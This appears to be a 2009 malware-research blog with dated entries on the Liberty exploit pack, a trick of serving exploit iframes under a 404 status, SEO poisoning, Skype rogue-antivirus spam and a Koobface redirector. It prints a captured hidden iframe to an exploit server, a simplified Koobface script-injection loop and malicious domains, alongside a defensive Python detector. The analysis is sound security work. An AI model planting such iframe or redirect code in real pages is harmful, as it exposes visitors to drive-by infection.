October 8, 2009
Here is another exploit toolkit that has been making the rounds recently: the Liberty exploit pack. Most notably, in mid-September, Liberty was used in a drive-by-download campaign that injected iframes pointing at searra-ditol.cn and embrari-1.cn into a large number of vulnerable web sites.
A couple of pages from the toolkit admin panel:
Finally, you can see the Wepawet domain report for searra-ditol.cn and for embrari-1.cn.
October 4, 2009
Here is an old trick for foiling manual and automated analysis of malicious pages that I still see used from time to time. When the malicious page is requested, the server sends back a 404 ("Not Found") HTTP status code. Normally, this status indicates that the requested resource could not be found on the server, and the returned page simply tries to help the visitor correct the error. However, in the case of malicious pages that use this trick, the body of the apparently missing page contains code that attempts to exploit browser vulnerabilities or redirects to other malicious web sites.
The following is an example of a page (hxxp://yahoo-analytics.net/laso/s.php) that uses this technique:
HTTP/1.1 404 Not Found
Date: Tue, 29 Sep 2009 07:26:41 GMT
Server: Apache/2
Last-Modified: Tue, 01 Sep 2009 12:55:36 GMT
Accept-Ranges: bytes
Vary: Accept-Encoding,User-Agent
Content-Encoding: gzip
Content-Length: 133
Content-Type: text/html
<iframe src="http://213.163.89.54/lib/index.php"
width=0 height=0
style="hidden"
frameborder=0 marginheight=0 marginwidth=0
scrolling=no>
</iframe>
The headers indicate that the page is missing, but the body contains an iframe that redirects the browser to a page that launches various browser exploits. Of course, stopping the analysis after observing the 404 status code would not reveal any wrongdoing. A complete analysis instead (see the Wepawet report for hxxp://yahoo-analytics.net/laso/s.php for all the details) shows that after the redirection malicious PDF and Flash files are delivered to the visitor's browser.
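As an added illustration (this is not code from the original post or from Wepawet), the following Python script shows the analysis habit the trick is meant to defeat: it parses a raw HTTP response, decodes a gzip-encoded body like the one above, and inspects the HTML for hidden or zero-sized iframes and off-site script tags no matter what the status code says. The two sample responses are constructed here from the headers and iframe shown above and from an ordinary "Not Found" page; the Content-Length header is omitted because the gzip body is built at run time.

```python
import gzip
from html.parser import HTMLParser


def parse_http_response(raw: bytes):
    """Split a raw HTTP/1.x response into (status_code, headers, body_text).

    Header names are lower-cased. A gzip Content-Encoding (as in the
    response above) is decoded so the caller always sees plain HTML.
    """
    head, _, body = raw.partition(b"\r\n\r\n")
    lines = head.decode("iso-8859-1").split("\r\n")
    status_code = int(lines[0].split(" ", 2)[1])
    headers = {}
    for line in lines[1:]:
        name, _, value = line.partition(":")
        headers[name.strip().lower()] = value.strip()
    if headers.get("content-encoding", "").lower() == "gzip":
        body = gzip.decompress(body)
    return status_code, headers, body.decode("utf-8", errors="replace")


class HiddenContentFinder(HTMLParser):
    """Collect iframes that are hidden or zero-sized and scripts loaded from other hosts."""

    def __init__(self):
        super().__init__()
        self.findings = []

    def handle_starttag(self, tag, attrs):
        a = {k.lower(): (v or "") for k, v in attrs}
        if tag == "iframe":
            zero_sized = a.get("width") in ("0", "0px") or a.get("height") in ("0", "0px")
            style = a.get("style", "").replace(" ", "").lower()
            hidden = "hidden" in style or "display:none" in style
            if zero_sized or hidden:
                self.findings.append(("hidden_iframe", a.get("src", "")))
        elif tag == "script" and a.get("src", "").lower().startswith(("http://", "https://", "//")):
            self.findings.append(("external_script", a["src"]))


def analyze_response(raw: bytes):
    """Return (status_code, findings). The body is inspected whatever the status code says."""
    status_code, _headers, body = parse_http_response(raw)
    finder = HiddenContentFinder()
    finder.feed(body)
    finder.close()
    return status_code, finder.findings


# Constructed sample: the 404 response above, with the iframe body gzip-encoded.
_BODY = (b'<iframe src="http://213.163.89.54/lib/index.php" width=0 height=0 '
         b'style="hidden" frameborder=0 marginheight=0 marginwidth=0 scrolling=no></iframe>')
SAMPLE_MALICIOUS_404 = (b"HTTP/1.1 404 Not Found\r\n"
                        b"Server: Apache/2\r\n"
                        b"Content-Encoding: gzip\r\n"
                        b"Content-Type: text/html\r\n"
                        b"\r\n" + gzip.compress(_BODY))

# Constructed sample: an ordinary 404 page with nothing to report.
SAMPLE_BENIGN_404 = (b"HTTP/1.1 404 Not Found\r\n"
                     b"Content-Type: text/html\r\n"
                     b"\r\n"
                     b"<html><body><h1>Not Found</h1><p>The requested URL was not found.</p></body></html>")

if __name__ == "__main__":
    for name, sample in (("malicious", SAMPLE_MALICIOUS_404), ("benign", SAMPLE_BENIGN_404)):
        status, findings = analyze_response(sample)
        print(f"{name}: status={status} findings={findings}")
```

The point of the design is that the status line is recorded but never used as a stop condition: a crawler or sandbox that short-circuits on 4xx responses never reaches the body, which is exactly what the trick relies on.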
October 2, 2009
A couple of days ago, Stephan Chenette of Websense published a nice post on an active SEO campaign (in the following days, Websense also released an alert discussing how the campaign abuses the launch of Google Wave).
I am also following this campaign, which seems quite widespread, in terms of the number of web sites and search terms that are involved. Unfortunately, the campaign is also successful in pushing some of its malicious pages high up in the results returned for popular query terms by Google.
Here is a case where they even make it to the top spot:
As explained in Chenette's post, the malicious results (in red in the figure above) redirect to sites that push rogue AV software.
No doubt, the taste of that John Dory is going to be quite... sour.
October 1, 2009
A new (at least for me) twist on the distribution of rogue AV software. Skype user online.notification.america17, whose full name is, cleverly enough, Online Notification, sent me a chat (see below) to inform me that the "Security Center has detected malware on my computer".
The URL that is referenced in the message (www.securonline.net) is currently down, but is listed in several blacklists, for example, hpHosts and WOT.
September 29, 2009
Long time, no write... but I thought this could be a good occasion to start again.
It looks like the Koobface people have been busy updating their social engineering tricks. But let's start from the beginning. I was inspecting fnplbpnbvxqjrey.blogspot.com, a BlogSpot blog that Wepawet flagged as suspicious and involved in pushing Koobface (see the Wepawet report for fnplbpnbvxqjrey.blogspot.com). At first sight, the blog appears to be just one of the many BlogSpot pages involved in this activity.
However, a closer look at the source code of the page reveals something interesting. The code responsible for actually redirecting to Koobface is a fairly recent variant (I have seen it used as early as 2009-09-12). Here is a slightly simplified listing of this code:
var ogxbjeqrihscndvz6 = [ /* list of server IPs */ ];   // compromised hosts that serve go.js
var mzvtonlxsjprcb5 = '';
cvuhxdinmlqjoeft1();   // defined elsewhere in the page; omitted from this simplified listing

// Pick the landing-page variant from the numeric ?id= query parameter.
var js = '/view';
var n = location.href.indexOf('?id=');
if (n != -1) {
    n = parseInt(location.href.substr(n + 4));
    if (n < 101)
        js = '/cnet';
    else if (n < 201)
        js = '/warn';
    else if (n < 301)
        js = '/scan';
    else if (n < 401)
        js = '';
}

// Append one <script> tag per server, pointing at go.js on that host
// with the chosen path and the original query string attached.
for (var onwxklrqhybjvpase3 = 0;
     onwxklrqhybjvpase3 < ogxbjeqrihscndvz6.length;
     onwxklrqhybjvpase3 ++) {
    var ypcovhrtbmn8 = document.createElement('script');
    ypcovhrtbmn8.type = 'text/javascript';
    ypcovhrtbmn8.src = 'http://' + ogxbjeqrihscndvz6[onwxklrqhybjvpase3] +
        '/go' + '.js' + '?0x3' + 'E8' + mzvtonlxsjprcb5 + js + '/' +
        (location.search.length > 0 ? location.search : '');
    document.getElementsByTagName('head')[0].appendChild(ypcovhrtbmn8);
}
The script loops over an array that holds the IPs of compromised machines to which visitors of the malicious blog are redirected. For each IP, an HTML script tag is added to the page, pointing to a URL on the compromised host. Depending on the value of the id parameter in the query string, the path of these URLs will contain one of the following strings: /view, /cnet, /warn, /scan.
When the redirection is finally triggered, the victim is presented with a different page, depending on which of these strings was included in the URL.
All the pages attempt to social engineer visitors into downloading and installing the Koobface malware. Here are screenshots that show the tricks they use:
(screenshots of the /view, /cnet, /scan and /warn pages)
Just a few more aces up Koobface's sleeve...